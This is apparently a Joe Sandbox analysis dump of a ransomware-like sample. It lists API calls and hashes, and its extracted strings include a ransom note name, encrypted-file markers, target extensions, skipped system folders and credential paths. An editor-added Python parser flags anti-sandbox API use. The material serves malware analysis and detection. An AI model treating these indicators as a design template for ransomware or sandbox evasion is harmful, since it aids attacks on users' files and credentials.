                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastPointer__dosmaperr
                                          • String ID:
                                          • API String ID: 2336955059-0
                                          • Opcode ID: fe4017000c3731cfbdf30551f173f46cafb8c7ed8e153f05d8e58606efd4397c
                                          • Instruction ID: 61be3a9d71711fff35a3f50cf5b766f9da9c7a54db8afcdb14a54564b1c182b7
                                          • Opcode Fuzzy Hash: fe4017000c3731cfbdf30551f173f46cafb8c7ed8e153f05d8e58606efd4397c
                                          • Instruction Fuzzy Hash: 4C01D833714515ABCB059FE9DC098AE7B3AEB85330B288249F8199B290EE759D51CB90
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(21472377), ref: 009C5DAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: w#G!
                                          • API String ID: 1890195054-519468572
                                          • Opcode ID: 8392eceb389ee1d3da4bfb515d7bc2798a0d748dcdf01a4e23fdaec752bdf67f
                                          • Instruction ID: 5732d444d62197521598a9067cda8d2f707c0ac584ba79158a22d6fe6cccda76
                                          • Opcode Fuzzy Hash: 8392eceb389ee1d3da4bfb515d7bc2798a0d748dcdf01a4e23fdaec752bdf67f
                                          • Instruction Fuzzy Hash: 3F119430704B0447EB14EB24D952B3EB3E8DB85711F41056DEE8F87781EE6AED509683
                                          APIs
                                          • EnumWindows.USER32(009C52E0,?), ref: 009C5900
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: EnumWindows
                                          • String ID: w#G!
                                          • API String ID: 1129996299-519468572
                                          • Opcode ID: 27e57a10f71083ea13a5fe70e4039ac7567bfc435f6f006b37e639598c23416b
                                          • Instruction ID: b5407301f473a8fe8bc6c7b1292b4e36d81c6bd0e340163efe5759e990013d90
                                          • Opcode Fuzzy Hash: 27e57a10f71083ea13a5fe70e4039ac7567bfc435f6f006b37e639598c23416b
                                          • Instruction Fuzzy Hash: FFE01235A0030CABCB00DFA5DD45B9EBBF8DB44301F5141A9D90697240DE706A058B95
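The function entries above follow a fixed plain-text layout that is easy to mine automatically. The following Python is added here by the editor and is not part of Joe Sandbox or of this report. It parses such entries into records, flags API calls that commonly appear in sandbox-evasion and network-enumeration code (the WATCHLIST tags are the editor's own heuristics, not findings of the report), and exploits a property visible above: the API String ID is the API ID hash joined with a hyphen to the String ID hash, so every entry referencing the string w#G! ends in 519468572, which lets functions that share a string be clustered. The SAMPLE text is constructed from entries on this page, with some argument lists shortened.

```python
"""Parse Joe Sandbox per-function entries and flag API usage worth a second look.
Editor's added example, not Joe Sandbox code; WATCHLIST tags are heuristics."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# "• API.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:". CRT entries such as __dosmaperr.LIBCMT
# carry no argument list at all.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+):\s+)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)$"
)
# Any other "• Key: value" line (API ID, String ID, fuzzy hashes, ...).
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Editor's heuristics (assumption, not report output): APIs that merit review.
WATCHLIST = {
    "GlobalMemoryStatusEx": "anti-sandbox: physical RAM size check",
    "EnumWindows": "anti-sandbox: top-level window count",
    "NetApiBufferFree": "netapi: frees a NetShareEnum/NetWkstaGetInfo-style buffer",
    "IsDebuggerPresent": "anti-debug: PEB BeingDebugged check",
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    subcall: Optional[str] = None  # callee address when reported via a subcall

@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def api_id(self) -> str:
        return self.fields.get("API ID", "")

    @property
    def string_hash(self) -> str:
        # "API String ID" is <hash of API ID>-<hash of String ID>; entries that
        # share a String ID share the second half (w#G! -> 519468572 above).
        return self.fields.get("API String ID", "").partition("-")[2]

def parse_entries(text: str) -> list:
    """Split report text into FunctionEntry records; the "Instruction Fuzzy
    Hash" field is the last line of every entry and closes the record."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.apis.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = FunctionEntry()
    return entries

def tag_entry(entry: FunctionEntry) -> set:
    return {WATCHLIST[c.api] for c in entry.apis if c.api in WATCHLIST}

def flagged(entries) -> list:
    """(API ID, sorted tags) for every entry that hit the watchlist."""
    return [(e.api_id, sorted(tag_entry(e))) for e in entries if tag_entry(e)]

def group_by_string_hash(entries) -> dict:
    """Cluster entries that reference the same string via the shared hash half."""
    groups = defaultdict(list)
    for e in entries:
        if e.string_hash and e.string_hash != "0":
            groups[e.string_hash].append(e.api_id)
    return dict(groups)

# Constructed sample: four entries in the shape of the report above (args trimmed).
SAMPLE = """\
APIs
• GlobalMemoryStatusEx.KERNEL32(21472377), ref: 009C5DAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
• API ID: GlobalMemoryStatus
• String ID: w#G!
• API String ID: 1890195054-519468572
• Instruction Fuzzy Hash: 3F119430704B0447EB14EB24D952B3EB3E8DB85711F41056DEE8F87781EE6AED509683
APIs
• NetApiBufferFree.NETAPI32(00000000), ref: 009C4606
• NetApiBufferFree.NETAPI32(00000000), ref: 009C4622
• API ID: BufferFree
• String ID: Default
• API String ID: 710964542-753088835
• Instruction Fuzzy Hash: B8F04F35F052099BDB28DF98D5A1BADB7B5EB49321F10426FD81663680CB35A9008A91
APIs
• EnumWindows.USER32(009C52E0,?), ref: 009C5900
• API ID: EnumWindows
• String ID: w#G!
• API String ID: 1129996299-519468572
• Instruction Fuzzy Hash: FFE01235A0030CABCB00DFA5DD45B9EBBF8DB44301F5141A9D90697240DE706A058B95
APIs
  • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27), ref: 00A75BC6
• _free.LIBCMT ref: 00A75B57
• API ID: Heap$AllocateErrorFreeLast_free
• String ID:
• API String ID: 314386986-0
• Instruction Fuzzy Hash: 3DF049B2405B009FE3349F50D841B52B7F8EB44725F10C82EE29E8BA91DBB5B8448B94
"""

if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    print(flagged(ents))
    print(group_by_string_hash(ents))
```

Feeding the full function section of a report to parse_entries and then reading flagged() gives a short review list instead of hundreds of entries; the string-hash grouping is what ties the GlobalMemoryStatusEx and EnumWindows functions above together, which is a useful hint that they belong to the same environment-check routine even before looking at the disassembly.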
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Xfsopenstd::_
                                          • String ID:
                                          • API String ID: 2914972069-0
                                          • Opcode ID: 94952484d9c5e4803437c812c5f44262fa6a8d2b8810786e44f35776e5b2e0a1
                                          • Instruction ID: 6328b0f23cd3c581681863e1a114c34c7b0436f4aa903b9cb1a4e6608071dbef
                                          • Opcode Fuzzy Hash: 94952484d9c5e4803437c812c5f44262fa6a8d2b8810786e44f35776e5b2e0a1
                                          • Instruction Fuzzy Hash: C8113232A0723166CB25571CFF06B6A379B9F42750F0C8035FD09955A8EE3CDC028290
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6), ref: 00A73BA9
                                          • GetFileType.KERNEL32(00000000), ref: 00A73BBB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileHandleType
                                          • String ID:
                                          • API String ID: 3000768030-0
                                          • Opcode ID: a3ce6bec6cbc7cf6381abac66b0ea4433f0bdc09877ef5e000714958a3eb2b3a
                                          • Instruction ID: 50bb730191a6c4bc18a75f37d4ee32aff3d74738fbe6c2c329f9a75cf4e4c783
                                          • Opcode Fuzzy Hash: a3ce6bec6cbc7cf6381abac66b0ea4433f0bdc09877ef5e000714958a3eb2b3a
                                          • Instruction Fuzzy Hash: 23117B7360874146CF314B7D8C886227A649B96330F3AC71AD1BF965F1C734DA45B544
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: bf75cbca420a9a02f9c75ac581affc5e6fe8791466183badc92ff905033a4b8f
                                          • Instruction ID: e68211956c3770adf4e2e96c73ea599aab1729f2169d9a570a52ccd4db0d8373
                                          • Opcode Fuzzy Hash: bf75cbca420a9a02f9c75ac581affc5e6fe8791466183badc92ff905033a4b8f
                                          • Instruction Fuzzy Hash: 10114871A0410AAFCF05DF58E940E9A7BF9EF49300F0184AAF808AB311D730ED218BA4
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 16f81336ff54dbf49749fba637e1f794eee834e48b030b179d76bbb9b64a5dd0
                                          • Instruction ID: 40225d34c7369d8ae3747f6d7b7ced1c478aab216563f7f15069eae95fffaa49
                                          • Opcode Fuzzy Hash: 16f81336ff54dbf49749fba637e1f794eee834e48b030b179d76bbb9b64a5dd0
                                          • Instruction Fuzzy Hash: 5C111871A0420AAFCB05DF58E941A9B7BF5EF48310F10849AF809AB352D771DD15CBA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fdda3eeaaeb209e15c66a46a25a7ed506e6a5ebcfd1ec3d6670bf254339221b4
                                          • Instruction ID: b3fd853f89bdc8d1686fc4367b0765edc1c75ad65e027e90f36472f69eb7e95d
                                          • Opcode Fuzzy Hash: fdda3eeaaeb209e15c66a46a25a7ed506e6a5ebcfd1ec3d6670bf254339221b4
                                          • Instruction Fuzzy Hash: 13F02833901A109BDA313779CD05B6B3BB88F82334F188715F568931D1EB74D9018A96
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: e8e25b1a4a499fa9f27b732a0f05a36be17529d4bac13837c30e757c8c426e00
                                          • Instruction ID: 95fe3efe5d788c07165937108661232be56e99da5daca1c9d89006a9e1300022
                                          • Opcode Fuzzy Hash: e8e25b1a4a499fa9f27b732a0f05a36be17529d4bac13837c30e757c8c426e00
                                          • Instruction Fuzzy Hash: A1F0BE33410109BBDF11AE95DC01CEF3B6DEF89330F104122FA1892050EB72CA30A7A1
                                          APIs
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          • _free.LIBCMT ref: 00A75B57
                                            • Part of subcall function 00A74D66: HeapFree.KERNEL32(00000000,00000000,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?), ref: 00A74D7C
                                            • Part of subcall function 00A74D66: GetLastError.KERNEL32(?,?,00A7D5F8,?,00000000,?,00000000,?,00A7D89C,?,00000007,?,?,00A7DC90,?,?), ref: 00A74D8E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateErrorFreeLast_free
                                          • String ID:
                                          • API String ID: 314386986-0
                                          • Opcode ID: e64fe523d368cac0baeaa9ac56b5a8e24b923aa59dc71abe73b32fc8f424433e
                                          • Instruction ID: 1ddd20ea025b9d7d5efa8065922960fd09e171753538f1b93810cc274bff1a52
                                          • Opcode Fuzzy Hash: e64fe523d368cac0baeaa9ac56b5a8e24b923aa59dc71abe73b32fc8f424433e
                                          • Instruction Fuzzy Hash: 3DF049B2405B009FE3349F50D841B52B7F8EB44725F10C82EE29E8BA91DBB5B8448B94
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 0f292e8d4653340d3a7fea27559d249c55094e83bfaf8a9aacc8575c5f42ee9f
                                          • Instruction ID: 24faf9cf21068128f1a67aaca4fbf390f34ee0d99b60621ece17f280b217591f
                                          • Opcode Fuzzy Hash: 0f292e8d4653340d3a7fea27559d249c55094e83bfaf8a9aacc8575c5f42ee9f
                                          • Instruction Fuzzy Hash: 9EE02B31E05B6457DA212B765C00F7B76589FC13B0F20C121AC1D9A1C0FBE1DC0189F0
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A41B69
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID:
                                          • API String ID: 2005118841-0
                                          • Opcode ID: 0fb0e72e1c552be02ed7dce4af45881d97a6b8193cd2f50071f95922015edfdc
                                          • Instruction ID: 93a56a5761be8e8192d27a695b984fc45dd547f5e173df631e25c0353aa2aa3f
                                          • Opcode Fuzzy Hash: 0fb0e72e1c552be02ed7dce4af45881d97a6b8193cd2f50071f95922015edfdc
                                          • Instruction Fuzzy Hash: 73E0D13840430D76CF047BB4EE16D6D377C9950364B104570BD24654F2EF70E556D5D1
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,00A80739,?,?,00000000,?,00A80739,00000000,0000000C), ref: 00A8037B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 7f70ffeedd48736244045ab71037f2791655348059ea174cf765a24282cd39ca
                                          • Instruction ID: 1619f100c40c5f1443fc0a88a5dda450c374ddcc543ebef1b0adac27715cf588
                                          • Opcode Fuzzy Hash: 7f70ffeedd48736244045ab71037f2791655348059ea174cf765a24282cd39ca
                                          • Instruction Fuzzy Hash: 5CD06C3210024DFFDF028F84DC06EDA3BAAFB48714F018000BA1856020C732E922AB90
                                          APIs
                                          • SetErrorMode.KERNEL32(00008003,21472377), ref: 009CAF9D
                                          • FindFirstFileW.KERNEL32(?,?,00AAFB88,00000002), ref: 009CAFC5
                                          • lstrcmpW.KERNEL32(?,00AAFEC0), ref: 009CC90E
                                          • lstrcmpW.KERNEL32(?,00AAFEC4), ref: 009CC924
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009CCC01
                                          • FindNextFileW.KERNEL32(?,?), ref: 009CD853
                                          • FindClose.KERNEL32(?), ref: 009CD867
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Find$Filelstrcmp$CloseErrorFirstIos_base_dtorModeNextstd::ios_base::_
                                          • String ID: .PBF$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$2$Dflt$Dflt$\Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Restore_Your_Files.txt$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\Users\Default\ntuser.dat$\WINDOWS$\Windows$\skips.txt$_Eg$_Enc$_Mail-$_[ID-$user$w#G!$w#G!
                                          • API String ID: 830838206-1208110058
                                          • Opcode ID: 0a93111099549bb98b1077674905eafaa7c3d73e1d11767a5d3b5e1e8b8cd17f
                                          • Instruction ID: e078b5fcd049b4ad5dc9095f12191833ee28e8200b6ac7a0d0dde6a9a7f68afd
                                          • Opcode Fuzzy Hash: 0a93111099549bb98b1077674905eafaa7c3d73e1d11767a5d3b5e1e8b8cd17f
                                          • Instruction Fuzzy Hash: 5B3348B1E002298BDB24DF28CD85BDDB7B5AF44304F5081EDE609A7291DB349AC5CF99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\WINDOWS$\Windows$\skips.txt$user$w#G!$w#G!
                                          • API String ID: 0-2777406613
                                          • Opcode ID: bc77907abc33c6da85e1b93fc77ff0502cdf710514c957a9144f0ccfe12e2770
                                          • Instruction ID: 08e6ab39fd6643f3726927cac9ad0616db5414d2c073f365f9f98996dbc4a3a8
                                          • Opcode Fuzzy Hash: bc77907abc33c6da85e1b93fc77ff0502cdf710514c957a9144f0ccfe12e2770
                                          • Instruction Fuzzy Hash: 8A624570E00659CFDF14DF68DC95BDEB7B1BB58305F1086A9D409A7290EB74AA88CF90
                                          APIs
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B376D
                                            • Part of subcall function 009B3740: __CxxThrowException@8.LIBVCRUNTIME ref: 009B37B2
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009C816A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
